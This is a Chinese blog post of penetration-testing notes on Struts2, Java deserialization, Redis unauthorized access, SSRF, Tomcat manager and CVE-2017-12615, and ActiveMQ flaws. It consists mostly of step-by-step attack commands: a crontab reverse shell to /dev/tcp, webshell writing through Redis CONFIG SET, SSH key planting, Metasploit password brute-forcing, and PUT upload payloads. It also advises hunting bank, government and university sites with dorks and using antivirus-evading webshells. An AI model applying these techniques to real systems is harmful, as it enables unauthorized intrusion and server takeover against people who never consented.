<!DOCTYPE html><html lang="zh-CN "><head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Hongxiaodou || 其他漏洞讲解</title>
    <meta name="author" content="hongxiaodou">
    <meta name="description" content="林深不见鹿，山巅自相逢 ">
    <meta name="keywords" content=" ">
    <link rel="icon" href="/images/1.png">
    <link rel="stylesheet" href="/css/antd.min.css">
    
    <link rel="stylesheet" href="/css/full-theme.css">
    
    <script src="/js/vue.js"></script>
    <script src="/js/antd.min.js"></script>
<!-- hexo injector head_end start --><style>
.body hanla:after {
    content: ' ';
    display: inline;
    font-family: Arial;
    font-size: 0.89em;
}

html code hanla,
html pre hanla,
html kbd hanla,
html samp hanla {
    display: none;
}

html ol > hanla,
html ul > hanla {
    display: none;
}
</style><!-- hexo injector head_end end --><meta name="generator" content="Hexo 5.4.0"></head>

<body>

    <div id="loading" style="height: 100vh; width: 100%; position: fixed;display: flex;z-index: 200; justify-content: space-between;">
        <div id="loadleft" style="width: 50%;background-color: #ffffff;transition: width 0.6s ease-out;"></div>
        <div id="loadright" style="width: 50%;background-color: #ffffff;transition: width 0.6s ease-out;"></div>
        <div style="position: fixed; height: 100vh; width: 100%;display: flex;justify-content: center;align-items: center;">
            <div id="loadcontent" style="width:400px;height:400px;padding:50px;border-radius:50%;display:flex;justify-content:center;align-items:center;border:solid 10px#a3ddfb; text-align:center;opacity:1;transition:opacity 0.3s ease-out;">
                <div>
                    <h2>LOADING...</h2>
                    <p><hanla></hanla>加载过慢请开启缓存<hanla></hanla>(浏览器默认开启)</p>
                    <div>
                        <img src="/dancingkitty.gif" alt="loading">
                    </div>
                </div>
            </div>
        </div>
    </div>

    <div id="layout">
        <transition name="into">
            <div v-show="show_page" style="display: none;">
                <div id="menu_show">
                     
<nav id="menu">
    <div class="desktop-menu">
        <a href="/">
            <span class="title">Hongxiaodou</span>
        </a>
        
        <a href="/">
            <span>
                <a-icon type="home" theme="filled">
            </a-icon></span>
            <span><hanla></hanla>主页</span>
        </a>
        
    </div>

    <div :class="'phone-menu ' + menu_show" id="phone-menu">
        <div :class="'title'" @click="menu_show=!menu_show">
            <span style="margin-right: 10px;">
                <a-icon type="appstore" theme="filled">
            </a-icon></span>
            <span><hanla></hanla>Hongxiaodou</span>
        </div>
        <div class="items" v-show="menu_show">
            
            <a href="/">
                <div class="item">
                    <div style="min-width:20px; max-width:50px; width: 10%">
                        <a-icon type="home" theme="filled">
                    </a-icon></div>
                    <div style="min-width:100px;max-width: 150%;width: 20%;"><hanla></hanla>主页</div>
                </div>
            </a>
            
        </div>
        <div class="curtain" v-show="menu_show"></div>
    </div>

</nav>
                </div>

                <div id="main">
                     
<link rel="stylesheet" href="/css/post-body.css">
<div class="article">
    <div>
        <h1>其他漏洞讲解 </h1>
    </div>
    <div class="info">
        <span class="date">
            <span class="icon">
                <a-icon type="calendar" theme="filled">
            </a-icon></span>
            2021/10/2
        </span>

        
        <span class="category">
            <a href="/categories/php常见漏洞">
                <span class="icon">
                    <a-icon type="book" theme="filled">
                </a-icon></span><hanla></hanla>
                php<hanla></hanla>常见漏洞
            </a>
        </span>
        

        
    </div>

    <div class="content" v-pre="">
        <h2 id="1-Struts2漏洞"><a href="#1-Struts2漏洞" class="headerlink" title="1.Struts2漏洞"></a><hanla></hanla>1.Struts2<hanla></hanla>漏洞</h2>  <span id="more"></span>

<p><hanla></hanla>Struts<hanla></hanla>是<hanla></hanla>Apache<hanla></hanla>基金会<hanla></hanla>Jakarta<hanla></hanla>项目组的一个开源项目，Struts<hanla></hanla>通过采用<hanla></hanla>Java Servlet/JSP<hanla></hanla>技术，<br><hanla></hanla>实现了基于<hanla></hanla>Java EE Web<hanla></hanla>应用的<hanla></hanla>Model-View-Controller（MVC）设计模式的应用框架，<br><hanla></hanla>是<hanla></hanla>MVC<hanla></hanla>经典设计模式中的一个经典产品。目前，Struts<hanla></hanla>广泛应用于大型互联网企业、政府、金融机构等网站建设，<br><hanla></hanla>并作为网站开发的底层模板使用，是应用最广泛的<hanla></hanla>Web<hanla></hanla>应用框架之一<br><hanla></hanla>userlogin.do  st1<br>userlogin.action st2</p>
<p>xxx.action<br><hanla></hanla>单个目标站点<br><hanla></hanla>工具爬行<hanla></hanla>action<br><hanla></hanla>采集工具  action 后缀采集出来<br>批量探测</p>
<p>注册<br>登录<br><hanla></hanla>oa<br><hanla></hanla>jsp 站  银行 三网 大学  政府（可能注入这些没有但是<hanla></hanla>str2<hanla></hanla>框架漏洞可能有）<br><hanla></hanla>032 移动<hanla></hanla>st2<br><hanla></hanla>银行<br><hanla></hanla>权<hanla></hanla>4<br><hanla></hanla>jsp<hanla></hanla>一般存在硬件<hanla></hanla>waf，防火墙可能上传码上传不成功<br>可以找免杀的马</p>
<h2 id="漏洞复现："><a href="#漏洞复现：" class="headerlink" title="漏洞复现："></a>漏洞复现：</h2><p><hanla></hanla>先安装<hanla></hanla>jar<hanla></hanla>环境可以直接用<hanla></hanla>burp<hanla></hanla>里面的<hanla></hanla>jar8<hanla></hanla>环境</p>
<p><a target="_blank" rel="noopener" href="https://imagelol.com/image/ImZdIT"><img src="https://s3.jpg.cm/2021/10/02/ImZdIT.png" alt="ImZdIT.png"></a></p>
<p><hanla></hanla>安装完成后安装<hanla></hanla>xampp<hanla></hanla>集成环境</p>
<p><a target="_blank" rel="noopener" href="https://imagelol.com/image/ImZeUE"><img src="https://s3.jpg.cm/2021/10/02/ImZeUE.png" alt="ImZeUE.png"></a></p>
<p><hanla></hanla>将漏洞检测的小源码放在，这个路径下，开启<hanla></hanla>tomcat<hanla></hanla>服务</p>
<p><a target="_blank" rel="noopener" href="https://imagelol.com/image/ImZ5tp"><img src="https://s3.jpg.cm/2021/10/02/ImZ5tp.png" alt="ImZ5tp.png"></a></p>
<p>然后访问这个网站</p>
<p><a target="_blank" rel="noopener" href="https://imagelol.com/image/ImZ706"><img src="https://s3.jpg.cm/2021/10/02/ImZ706.png" alt="ImZ706.png"></a></p>
<p><hanla></hanla>点进入用户登录，看到有<hanla></hanla>action<hanla></hanla>的就可以用漏洞检测工具进行检测<br>这里推荐两款工具</p>
<p><a target="_blank" rel="noopener" href="https://imagelol.com/image/ImZnnD"><img src="https://s3.jpg.cm/2021/10/02/ImZnnD.png" alt="ImZnnD.png"></a></p>
<p>然后一个个点击获取信息就可以查看是否存在漏洞</p>
<p><a target="_blank" rel="noopener" href="https://imagelol.com/image/ImZloQ"><img src="https://s3.jpg.cm/2021/10/02/ImZloQ.png" alt="ImZloQ.png"></a></p>
<p>这里很尴尬测试传马都传不上去，<br>可能问题是字符串太长  ，<br>不免杀，（冰蝎一句话做免杀）<br><hanla></hanla>linux  utf-8 上传<hanla></hanla>gbk<hanla></hanla>就报错<br>但是我这里好像都不是，写的很短了文件里面什么都没有我感觉是工具问题<br>批量采集可以搜索<br><hanla></hanla>inurl:usrlogin.action<br>userchecklogin.action<br><hanla></hanla>漏洞最好是刚出来去测试会很多，后面响应很快就不好找了  </p>
<h2 id="java反序列化漏洞"><a href="#java反序列化漏洞" class="headerlink" title="java反序列化漏洞"></a><hanla></hanla>java<hanla></hanla>反序列化漏洞</h2><p><hanla></hanla>2015<hanla></hanla>年的<hanla></hanla>1<hanla></hanla>月<hanla></hanla>28<hanla></hanla>号，Gabriel Lawrence (@gebl)<hanla></hanla>和<hanla></hanla>Chris Frohoff (@frohoff)  在<hanla></hanla>AppSecCali<hanla></hanla>上给出了一个报告，<br><hanla></hanla>报告中介绍了<hanla></hanla>Java<hanla></hanla>反序列化漏洞可以利用<hanla></hanla>Apache Commons   Collections<hanla></hanla>这个常用的<hanla></hanla>Java<hanla></hanla>库来实现任意代码执行，<br>当时并没有引起太大的关注。  </p>
<p><hanla></hanla>2015<hanla></hanla>年<hanla></hanla>11<hanla></hanla>月<hanla></hanla>6<hanla></hanla>日，<br><hanla></hanla>FoxGlove Security<hanla></hanla>安全团队的<hanla></hanla>@breenmachine   发布的一篇博客中介绍了如何利用<hanla></hanla>Java<hanla></hanla>反序列化漏洞，<br><hanla></hanla>来攻击最新版的<hanla></hanla>WebLogic、WebSphere、JBoss、Jenkins、OpenNMS<hanla></hanla>这些大名鼎鼎的<hanla></hanla>Java<hanla></hanla>应用，实现远程代码执行。  </p>
<p><hanla></hanla>序列化就是把对象转换成字节流，便于保存在内存、文件、数据库中；反序列化即逆过程  ，由字节流还原成对象。Java<hanla></hanla>中的<hanla></hanla>ObjectOutputStream<hanla></hanla>类的<hanla></hanla>writeObject()<hanla></hanla>方法可以实现序列化，类<hanla></hanla>ObjectInputStream<hanla></hanla>类的<hanla></hanla>readObject()<hanla></hanla>方法用于反序列化。<br>这里就是用一个工具扫  </p>
<p>weblogic 端口：7001  </p>
<p><a target="_blank" rel="noopener" href="https://imagelol.com/image/ImZ6xh"><img src="https://s3.jpg.cm/2021/10/02/ImZ6xh.png" alt="ImZ6xh.png"></a></p>
<h2 id="Redis漏洞简介以及危害"><a href="#Redis漏洞简介以及危害" class="headerlink" title="Redis漏洞简介以及危害"></a><hanla></hanla>Redis<hanla></hanla>漏洞简介以及危害</h2><p><hanla></hanla>Redis<hanla></hanla>是一个开源的使用<hanla></hanla>ANSI C<hanla></hanla>语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value<hanla></hanla>数据库，并提供多种语言的<hanla></hanla>API。<br><hanla></hanla>1.<hanla></hanla>什么是<hanla></hanla>redis<hanla></hanla>未授权访问漏洞：<br>Redis 默认情况下，会绑定在 0.0.0.0:6379，<br><hanla></hanla>，如果没有进行采用相关的策略，比如添加防火墙规则避免其他非信任来源 ip 访问等，这样将会将 Redis 服务暴露到公网上，如果在没有设置密码认证（一般为空）的情况下，会导致任意用户在可以访问目标服务器的情况下未授权访问 Redis 以及读取 Redis 的数据。攻击者在未授权访问 Redis 的情况下，利用 Redis 自身的提供的<hanla></hanla>config   命令，可以进行写文件操作，攻击者可以成功将自己的<hanla></hanla>ssh<hanla></hanla>公钥写入目标服务器的 /root/.ssh 文件夹的<hanla></hanla>authotrized_keys 文件中，进而可以使用对应私钥直接使用<hanla></hanla>ssh<hanla></hanla>服务登录目标服务器。<br>简单说，漏洞的产生条件有以下两点：  </p>
<p><hanla></hanla>（1）redis<hanla></hanla>绑定在 0.0.0.0:6379，且没有进行添加防火墙规则避免其他非信任来源 ip 访问等相关安全策略，直接暴露在公网；<br><hanla></hanla>（2）没有设置密码认证（一般为空），可以免密码远程登录<hanla></hanla>redis<hanla></hanla>服务。  </p>
<h3 id="漏洞危害"><a href="#漏洞危害" class="headerlink" title="漏洞危害"></a>漏洞危害</h3><p><hanla></hanla>（1）攻击者无需认证访问到内部数据，可能导致敏感信息泄露，黑客也可以恶意执行<hanla></hanla>flushall<hanla></hanla>来清空所有数据；</p>
<p><hanla></hanla>（2）攻击者可通过<hanla></hanla>EVAL<hanla></hanla>执行<hanla></hanla>lua<hanla></hanla>代码，或通过数据备份功能往磁盘写入后门文件；</p>
<p><hanla></hanla>（3）最严重的情况，如果<hanla></hanla>Redis<hanla></hanla>以<hanla></hanla>root<hanla></hanla>身份运行，黑客可以给<hanla></hanla>root<hanla></hanla>账户写入<hanla></hanla>SSH<hanla></hanla>公钥文件，直接通过<hanla></hanla>SSH<hanla></hanla>登录受害服务器</p>
<h3 id="漏洞环境搭建"><a href="#漏洞环境搭建" class="headerlink" title="漏洞环境搭建"></a>漏洞环境搭建</h3><p><hanla></hanla>（一）安装<hanla></hanla>redis<hanla></hanla>服务：<br>（1）从官网下载源码的压缩包：<br>     wget <a target="_blank" rel="noopener" href="http://download.redis.io/releases/redis-3.2.11.tar.gz">http://download.redis.io/releases/redis-3.2.11.tar.gz</a><br>（2）下载完成后，解压压缩包：<br>     tar xzf redis-3.2.11.tar.gz；<br><hanla></hanla>（3）然后进入解压后的目录：cd redis-3.2.11，输入<hanla></hanla>make<hanla></hanla>并执行；<br><hanla></hanla>（4）make<hanla></hanla>结束后，进入<hanla></hanla>src<hanla></hanla>目录：cd src，将<hanla></hanla>redis-server<hanla></hanla>和<hanla></hanla>redis-cli<hanla></hanla>拷贝到<hanla></hanla>/usr/bin<hanla></hanla>目录下（这样启动<hanla></hanla>redis-server<hanla></hanla>和<hanla></hanla>redis-cli<hanla></hanla>就不用每次都进入安装目录了）：<br><hanla></hanla>（5）返回目录<hanla></hanla>redis-3.2.11，将<hanla></hanla>redis.conf<hanla></hanla>拷贝到<hanla></hanla>/etc/<hanla></hanla>目录下：<br><hanla></hanla>（6）编辑<hanla></hanla>etc<hanla></hanla>中的<hanla></hanla>redis<hanla></hanla>配置文件<hanla></hanla>redis.conf，如下图所示：<br><hanla></hanla>     去掉<hanla></hanla>ip<hanla></hanla>绑定，允许除本地外的主机远程登录<hanla></hanla>redis<hanla></hanla>服务：<br>      # 127.0.0.1<br><hanla></hanla>     关闭保护模式，允许远程连接<hanla></hanla>redis<hanla></hanla>服务：<br>      protected-mode no<br><hanla></hanla>（7）使用<hanla></hanla>/etc/<hanla></hanla>目录下的<hanla></hanla>reids.conf<hanla></hanla>文件中的配置启动<hanla></hanla>redis<hanla></hanla>服务：<br>      redis-server /etc/redis.conf   </p>
<pre><code>iptables -F  
</code></pre>
<p><hanla></hanla>如果给<hanla></hanla>Redis<hanla></hanla>设置密码，可以通过修改<hanla></hanla>/etc/redis.conf   文件来配置密码，修改完重启服务<br><hanla></hanla>requirepass  admin  </p>
<p><a target="_blank" rel="noopener" href="https://imagelol.com/image/ImZ86S"><img src="https://s3.jpg.cm/2021/10/02/ImZ86S.png" alt="ImZ86S.png"></a></p>
<p>然后服务起来了</p>
<p><a target="_blank" rel="noopener" href="https://imagelol.com/image/ImZAFW"><img src="https://s3.jpg.cm/2021/10/02/ImZAFW.png" alt="ImZAFW.png"></a></p>
<p>扫描端口：<br>nmap -p 1-65535 192169.43.9<br><hanla></hanla>找到开放的<hanla></hanla>6379 redis  </p>
<p><a target="_blank" rel="noopener" href="https://imagelol.com/image/ImZXj2"><img src="https://s3.jpg.cm/2021/10/02/ImZXj2.png" alt="ImZXj2.png"></a></p>
<pre><code><hanla></hanla>redis-cli -p 6379 -h 192.168.43.9
找到网站根目录  往里面写<hanla></hanla>shell

apt-get install redis #kali<hanla></hanla>需要安装链接客户端

写 webshell 文件实现远程控制
一旦控制 redis 后，优先想到的是写 webshell，
容错性是它最大优势。假定目标是 PHP 环境、web 的根目录为<hanla></hanla>/var/www/html，
按前面步骤尝试写个普通 PHP 脚本看下是否能成功解析：

$ redis-cli -p 6379 -h 192.168.230.128
192.168.230.128:6379&gt; CONFIG SET dbfilename phpinfo.php
OK
192.168.230.128:6379&gt; CONFIG SET dir "/var/www/html"
OK
192.168.230.128:6379&gt; CONFIG SET rdbcompression no
OK
192.168.230.128:6379&gt; SET phpinfo"\n\n <!--?php phpinfo(); ?--> \n\n" NX
OK
192.168.230.128:6379&gt; save
OK
</code></pre>
<p><a target="_blank" rel="noopener" href="https://imagelol.com/image/ImZJUO"><img src="https://s3.jpg.cm/2021/10/02/ImZJUO.png" alt="ImZJUO.png"></a></p>
<h3 id="redis漏洞利用"><a href="#redis漏洞利用" class="headerlink" title="redis漏洞利用"></a><hanla></hanla>redis<hanla></hanla>漏洞利用</h3><p>写计划任务<br><hanla></hanla>将反弹<hanla></hanla>shell<hanla></hanla>脚本写入<hanla></hanla>/etc/crontab<br>set 1 “\n\n\n\n* * * * * root bash -i &gt;&amp;<br>/dev/tcp/192.168.8.124/1122 0&gt;&amp;1\n\n\n\n”<br>config set dir /etc/<br>config set dbfilename crontab<br>save  </p>
<p>nc -l -p 1122  </p>
<p><a target="_blank" rel="noopener" href="https://imagelol.com/image/ImZrFk"><img src="https://s3.jpg.cm/2021/10/02/ImZrFk.png" alt="ImZrFk.png"></a></p>
<p><a target="_blank" rel="noopener" href="https://imagelol.com/image/ImZND8"><img src="https://s3.jpg.cm/2021/10/02/ImZND8.png" alt="ImZND8.png"></a></p>
<p>meterpreter&gt;  portfwd add -I 6378 -P 6379 -R 127.0.0.1<br>redis-cli -p 6378 -h 127.0.0.1<br><hanla></hanla>端口转发，提权  </p>
<p>如果有密码</p>
<h3 id="利用MSF-破解Redis弱口令导入ssh公钥链接"><a href="#利用MSF-破解Redis弱口令导入ssh公钥链接" class="headerlink" title="利用MSF 破解Redis弱口令导入ssh公钥链接"></a><hanla></hanla>利用<hanla></hanla>MSF 破解<hanla></hanla>Redis<hanla></hanla>弱口令导入<hanla></hanla>ssh<hanla></hanla>公钥链接</h3><p><hanla></hanla>search redis<br>auxiliary/scanner/redis/file_upload &nbsp;<br><hanla></hanla>该<hanla></hanla>exp<hanla></hanla>功能为上传本地的文件到目标服务器。<br>auxiliary/scanner/redis/redis_login &nbsp;<br><hanla></hanla>该<hanla></hanla>exp<hanla></hanla>功能是对<hanla></hanla>redis<hanla></hanla>的密码进行枚举，<br>亲测速度很快。<br>auxiliary/scanner/redis/redis_server<br><hanla></hanla> #该<hanla></hanla>exp<hanla></hanla>功能是验证枚举或者其他手段得到的<hanla></hanla>redis<hanla></hanla>密码是否正确，该功能会执行一个<hanla></hanla>i  nfo<hanla></hanla>命令并返回执行结果。</p>
<h4 id="使用auxiliary-scanner-redis-redis-login进行枚举redis密码"><a href="#使用auxiliary-scanner-redis-redis-login进行枚举redis密码" class="headerlink" title="使用auxiliary/scanner/redis/redis_login进行枚举redis密码"></a><hanla></hanla>使用<hanla></hanla>auxiliary/scanner/redis/redis_login<hanla></hanla>进行枚举<hanla></hanla>redis<hanla></hanla>密码</h4><p><a target="_blank" rel="noopener" href="https://imagelol.com/image/ImZY6i"><img src="https://s3.jpg.cm/2021/10/02/ImZY6i.png" alt="ImZY6i.png"></a></p>
<p><a target="_blank" rel="noopener" href="https://imagelol.com/image/ImZtow"><img src="https://s3.jpg.cm/2021/10/02/ImZtow.png" alt="ImZtow.png"></a></p>
<p><hanla></hanla>使用<hanla></hanla>auxiliary/scanner/redis/redis_server<hanla></hanla>确认密码的可用性</p>
<p><a target="_blank" rel="noopener" href="https://imagelol.com/image/ImZsye"><img src="https://s3.jpg.cm/2021/10/02/ImZsye.png" alt="ImZsye.png"></a></p>
<p><a target="_blank" rel="noopener" href="https://imagelol.com/image/ImZm25"><img src="https://s3.jpg.cm/2021/10/02/ImZm25.png" alt="ImZm25.png"></a></p>
<p><hanla></hanla>上传文件<hanla></hanla>ssh<hanla></hanla>密钥<br><hanla></hanla>auxiliary/scanner/redis/file_upload  上传文件模块<br><hanla></hanla>ssh-keygen -t rsa<br>cd /root/.ssh/<br>cp id_rsa.pub  authorized_keys<br>vi authorized_keys  </p>
<p>在文件内容得前面和后面都加上\n\n\n<br><hanla></hanla>为了能正常上传测试，在目标机器上创建<hanla></hanla>/root/.ssh 目录<br><hanla></hanla>mkdir /root/.ssh  </p>
<p><a target="_blank" rel="noopener" href="https://imagelol.com/image/ImZkNr"><img src="https://s3.jpg.cm/2021/10/02/ImZkNr.png" alt="ImZkNr.png"></a></p>
<p><a target="_blank" rel="noopener" href="https://imagelol.com/image/ImZF5y"><img src="https://s3.jpg.cm/2021/10/02/ImZF5y.png" alt="ImZF5y.png"></a></p>
<p>给密钥头尾加一些\n\n\n\n</p>
<p><a target="_blank" rel="noopener" href="https://imagelol.com/image/ImZvLC"><img src="https://s3.jpg.cm/2021/10/02/ImZvLC.png" alt="ImZvLC.png"></a></p>
<p>然后设置模块上传</p>
<p><a target="_blank" rel="noopener" href="https://imagelol.com/image/ImZ27X"><img src="https://s3.jpg.cm/2021/10/02/ImZ27X.png" alt="ImZ27X.png"></a></p>
<p>然后使用自己的私钥去连接他<br><hanla></hanla>cd /root/.ssh<br>ssh -i id_rsa <a href="mailto:root@192.168.230.128">root@192.168.230.128</a>  </p>
<h2 id="SSRF-Server-Side-Request-Forgery-服务器端请求伪造"><a href="#SSRF-Server-Side-Request-Forgery-服务器端请求伪造" class="headerlink" title="SSRF(Server-Side Request Forgery:服务器端请求伪造)"></a><hanla></hanla>SSRF(Server-Side Request Forgery:<hanla></hanla>服务器端请求伪造)</h2><p><hanla></hanla>csrf<hanla></hanla>是客户端请求伪造<br><hanla></hanla>SSRF(Server-Side Request Forgery:<hanla></hanla>服务器端请求伪造)   是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。<br><hanla></hanla>一般情况下，SSRF<hanla></hanla>攻击的目标是从外网无法访问的内部系统。（正是因为它是由服务端  发起的，<br>所以它能够请求到与它相连而与外网隔离的内部系统）  </p>
<p>SSRF 形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功能且没有对目标地址做过滤与限制。<br><hanla></hanla>比如从指定<hanla></hanla>URL<hanla></hanla>地址获取网页文本内容，加载指定地址的图片，下载等等。</p>
<p>漏洞产生<br>用户在地址栏输入网址 –》 向目标网站发送请求 –》   目标网站接受请求并在服务器端验证请求是否合法，<br>然后返回用户所需要的页面 –》用户接收页面并在浏览器中显示  </p>
<p>【此处的请求默认为<a target="_blank" rel="noopener" href="http://www.xxx.com/a.php?image=%EF%BC%88%E5%9C%B0%E5%9D%80%EF%BC%89%E3%80%91"><hanla></hanla>www.xxx.com/a.php?image=（地址）】</a>  </p>
<p><hanla></hanla>那么产生<hanla></hanla>SSRF<hanla></hanla>漏洞的环节在哪里呢？目标网站接受请求后在服务器端验证请求是否合法</p>
<p>产生的原因：服务器端的验证并没有对其请求获取图片的参数（image=）做出严格的过滤以及限制，<br>导致可以从其他服务器的获取一定量的数据  </p>
<p><a target="_blank" rel="noopener" href="http://www.xxx.com/a.php?image=http://www.abc.com/1.jpg">www.xxx.com/a.php?image=http://www.abc.com/1.jpg</a>  </p>
<p>如果我们将<a target="_blank" rel="noopener" href="http://www.abc.com/"><hanla></hanla>http://www.abc.com/</a><hanla></hanla>  1.jpg<hanla></hanla>换为与该服务器相连的内网服务器地址会产生什么效果呢？  </p>
<p><hanla></hanla>如果存在该内网地址就会返回<hanla></hanla>1xx 2xx 之类的状态码，不存在就会其他的状态码  </p>
<p><hanla></hanla>终极简析: SSRF<hanla></hanla>漏洞就是通过篡改获取资源的请求发送给服务器，但是服务器并没有发  现在这个请求是合法的，然后服务器以他的身份来访问其他服务器的资源。</p>
<h4 id="ssrf漏洞的寻找（漏洞常见的出没位置）"><a href="#ssrf漏洞的寻找（漏洞常见的出没位置）" class="headerlink" title="ssrf漏洞的寻找（漏洞常见的出没位置）"></a><hanla></hanla>ssrf<hanla></hanla>漏洞的寻找（漏洞常见的出没位置）</h4><p><hanla></hanla>1）分享：通过<hanla></hanla>URL<hanla></hanla>地址分享网页内容<br><hanla></hanla>2）转码服务<br><hanla></hanla>3）在线翻译<br><hanla></hanla>4）图片加载与下载：通过<hanla></hanla>URL<hanla></hanla>地址加载或下载图片<br><hanla></hanla>5）图片、文章收藏功能<br><hanla></hanla>6）未公开的<hanla></hanla>api<hanla></hanla>实现以及其他调用<hanla></hanla>URL<hanla></hanla>的功能<br><hanla></hanla>7）从<hanla></hanla>URL<hanla></hanla>关键字中寻找<br><hanla></hanla>share。wap。url。link。src。source。target。<br>u。3g。display。sourceURl。imageURL 。domain  </p>
<p><hanla></hanla>ssrf<hanla></hanla>文章<br><a target="_blank" rel="noopener" href="https://www.jianshu.com/p/6bf7700139fa"><hanla></hanla>https://www.jianshu.com/p/6bf7700139fa</a><br><a target="_blank" rel="noopener" href="https://www.jianshu.com/p/cc752eb8deca">https://www.jianshu.com/p/cc752eb8deca</a></p>
<h2 id="web中间件漏洞"><a href="#web中间件漏洞" class="headerlink" title="web中间件漏洞"></a><hanla></hanla>web<hanla></hanla>中间件漏洞</h2><p><hanla></hanla>tomcat 部署漏洞</p>
<p>安装<br><a target="_blank" rel="noopener" href="https://blog.csdn.net/qq_28189423/article/details/90547997?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522163314926816780264091387%2522%252C%2522scm%2522%253A%252220140713.130102334.pc%255Fall.%2522%257D&amp;request_id=163314926816780264091387&amp;biz_id=0&amp;utm_medium=distribute.pc_search_result.none-task-blog-2~all~first_rank_ecpm_v1~rank_v31_ecpm-1-90547997.first_rank_v2_pc_rank_v29&amp;utm_term=windows2008%E5%AE%89%E8%A3%85tomacat&amp;spm=1018.2226.3001.4187"><hanla></hanla>https://blog.csdn.net/qq_28189423/article/details/90547997?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522163314926816780264091387%2522%252C%2522scm%2522%253A%252220140713.130102334.pc%255Fall.%2522%257D&amp;request_id=163314926816780264091387&amp;biz_id=0&amp;utm_medium=distribute.pc_search_result.none-task-blog-2~all~first_rank_ecpm_v1~rank_v31_ecpm-1-90547997.first_rank_v2_pc_rank_v29&amp;utm_term=windows2008%E5%AE%89%E8%A3%85tomacat&amp;spm=1018.2226.3001.4187</a></p>
<p><a target="_blank" rel="noopener" href="https://www.cnblogs.com/xuem-/p/11962280.html">https://www.cnblogs.com/xuem-/p/11962280.html</a></p>
<p><hanla></hanla>访问<hanla></hanla>tomacat mamnager<br><hanla></hanla>页面<br>尝试弱口令爆破<br>登录管理页面<br><hanla></hanla>部署<hanla></hanla>war<hanla></hanla>文件<br><hanla></hanla>得到<hanla></hanla>shell<br><hanla></hanla>工具默认只爆<hanla></hanla>user=admin<hanla></hanla>所有你可以自己添加用户和密码，<br>我设置的密码为 name pwd 所以没爆出来  </p>
<p><a target="_blank" rel="noopener" href="https://imagelol.com/image/ImZzy4"><img src="https://s3.jpg.cm/2021/10/02/ImZzy4.png" alt="ImZzy4.png"></a></p>
<p><hanla></hanla>在<hanla></hanla>jdk<hanla></hanla>环境下<br><hanla></hanla>用这条命令把木马<hanla></hanla>1.jsp  2.jsp  3.jsp<hanla></hanla>打包<br><hanla></hanla>jar.exe cvf xx.war 1.jsp 2.jsp 3.jsp  </p>
<p><a target="_blank" rel="noopener" href="https://imagelol.com/image/ImZ4Dz"><img src="https://s3.jpg.cm/2021/10/02/ImZ4Dz.png" alt="ImZ4Dz.png"></a></p>
<p><hanla></hanla>在这里我们可以上传<hanla></hanla>war<hanla></hanla>包</p>
<p><a target="_blank" rel="noopener" href="https://imagelol.com/image/ImZgkG"><img src="https://s3.jpg.cm/2021/10/02/ImZgkG.png" alt="ImZgkG.png"></a></p>
<p>然后可以之接访问后台</p>
<p><a target="_blank" rel="noopener" href="https://imagelol.com/image/ImZfVu"><img src="https://s3.jpg.cm/2021/10/02/ImZfVu.png" alt="ImZfVu.png"></a></p>
<h2 id="tomcat远程命令执行漏洞（cve-2017-12615"><a href="#tomcat远程命令执行漏洞（cve-2017-12615" class="headerlink" title="tomcat远程命令执行漏洞（cve-2017-12615)"></a><hanla></hanla>tomcat<hanla></hanla>远程命令执行漏洞（cve-2017-12615)</h2><p><hanla></hanla>影响范围<br><hanla></hanla>Apache Tomcat 7.0.0 – 7.0.81<br><hanla></hanla>安装完<hanla></hanla>tomcat 配置下<hanla></hanla>web.xml<hanla></hanla>文件，然后重启服务  </p>
<p><a target="_blank" rel="noopener" href="https://imagelol.com/image/ImZ3ND"><img src="https://s3.jpg.cm/2021/10/02/ImZ3ND.png" alt="ImZ3ND.png"></a></p>
<p><hanla></hanla>1.<hanla></hanla>利用<hanla></hanla>PUT<hanla></hanla>方法上传构造好的<hanla></hanla>shell<br><hanla></hanla>在构造上传方法时有三种<br><hanla></hanla>PUT /test.jsp%20<br>PUT /test.jsp/<br>PUT /test.jsp:DATA<br><hanla></hanla>通过构造特殊的后缀来绕过，Tomcat<hanla></hanla>的检测，将<hanla></hanla>jsp<hanla></hanla>的<hanla></hanla>shell<hanla></hanla>上传到服务器中。<br><hanla></hanla>2.<hanla></hanla>利用上传的<hanla></hanla>shell<hanla></hanla>来进行命令执行  </p>
<p><a target="_blank" rel="noopener" href="https://imagelol.com/image/ImZC2p"><img src="https://s3.jpg.cm/2021/10/02/ImZC2p.png" alt="ImZC2p.png"></a></p>
<p><a target="_blank" rel="noopener" href="https://imagelol.com/image/ImZhP6"><img src="https://s3.jpg.cm/2021/10/02/ImZhP6.png" alt="ImZhP6.png"></a></p>
<h2 id="Apache-ActiveMQ-Fileserver远程代码执行漏洞"><a href="#Apache-ActiveMQ-Fileserver远程代码执行漏洞" class="headerlink" title="Apache ActiveMQ Fileserver远程代码执行漏洞"></a><hanla></hanla>Apache ActiveMQ Fileserver<hanla></hanla>远程代码执行漏洞</h2><p><hanla></hanla>扫端口的时候遇到<hanla></hanla>8161<hanla></hanla>端口，输入<hanla></hanla>admin/admin<br><hanla></hanla>通过<hanla></hanla>put<hanla></hanla>上去一句话然后<hanla></hanla>move<hanla></hanla>移动到<hanla></hanla>admin<hanla></hanla>目录即可拿<hanla></hanla>shell  </p>
<p><a target="_blank" rel="noopener" href="https://imagelol.com/image/ImZjbT"><img src="https://s3.jpg.cm/2021/10/02/ImZjbT.png" alt="ImZjbT.png"></a></p>
<p>ActiveMQ 5.1.0 下载地址：<a target="_blank" rel="noopener" href="http://activemq.apache.org/activemq-510-release.html">http://activemq.apache.org/activemq-510-release.html</a><br><hanla></hanla>解压后<br><hanla></hanla>，双击运行<hanla></hanla>abtivemq.bat<hanla></hanla>运行。（<br><hanla></hanla>进入<hanla></hanla>bin<hanla></hanla>目录，根据自己的操作系统选择<hanla></hanla>win32<hanla></hanla>或<hanla></hanla>win64，5.1.0<hanla></hanla>只有<hanla></hanla>win32<hanla></hanla>目录）<br><hanla></hanla>访问<hanla></hanla>8161<hanla></hanla>端口：  </p>
<h3 id="漏洞利用"><a href="#漏洞利用" class="headerlink" title="漏洞利用"></a>漏洞利用</h3><p><hanla></hanla>1、 获取物理路径<br><hanla></hanla>PUT /fileserver/%20/%20 HTTP/1.1<br><hanla></hanla>这个是固定用法，可以爆出网站的绝对路径</p>
